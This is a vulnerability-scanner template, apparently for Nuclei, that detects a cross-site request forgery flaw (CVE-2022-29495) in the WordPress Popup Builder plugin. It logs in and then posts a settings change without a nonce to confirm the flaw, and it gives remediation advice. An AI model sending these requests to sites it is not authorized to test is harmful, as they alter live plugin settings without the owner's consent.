id: CVE-2022-29495

info:
  name: WordPress Popup Builder <= 4.1.11 - Cross-Site Request Forgery
  author: Shivam Kamboj
  severity: medium
  description: |
    Sygnoos Popup Builder plugin <= 4.1.11 for WordPress contains a cross-site request forgery caused by a lack of CSRF protection in the plugin settings update handler, letting attackers change plugin settings without authorization. Exploitation requires the victim to visit a malicious site or click a malicious link while logged in.
  impact: |
    Attackers can modify plugin settings without authorization, potentially leading to site defacement or malicious content injection.
  remediation: |
    Implement CSRF tokens (nonces) and verify them on every settings-update request; update to the latest plugin version.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29495
    - https://patchstack.com/database/vulnerability/popup-builder/wordpress-popup-builder-plugin-4-1-11-cross-site-request-forgery-csrf-leading-to-plugin-settings-update
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "plugins/popup-builder"
  tags: cve,cve2022,wordpress,wp-plugin,popup-builder,csrf,authenticated,wp

flow: http(1) && http(2)

http:
  # Step 1: authenticate to obtain the wordpress_logged_in cookie (internal matcher, not reported)
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(header, "wordpress_logged_in")'
        condition: and
        internal: true

  # Step 2: submit a settings update without any nonce; a redirect back to the settings page confirms it was accepted
  - raw:
      - |
        POST /wp-admin/admin-post.php?action=sgpbSaveSettings HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sgpb-enable-debug-mode=on&sgpb-dont-delete-data=on&sgpb-disable-analytics-general=on

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(header, "page=sgpbSettings") && contains(header, "post_type=popupbuilder")'
        condition: and

    extractors:
      - type: regex
        part: header
        regex:
          - "Location: (.+)"
        group: 1
# digest: 4b0a00483046022100a2416e5e88d19ff6761f558c2a2efc6e3fc13244e065d3fc8d9782aa5c6808ac022100d6bddfa1e68c1a7ce971f65743dacd96f891a3530f4c76b7e3e1e488b651980d:922c64590222798bb761d5b6d8e72950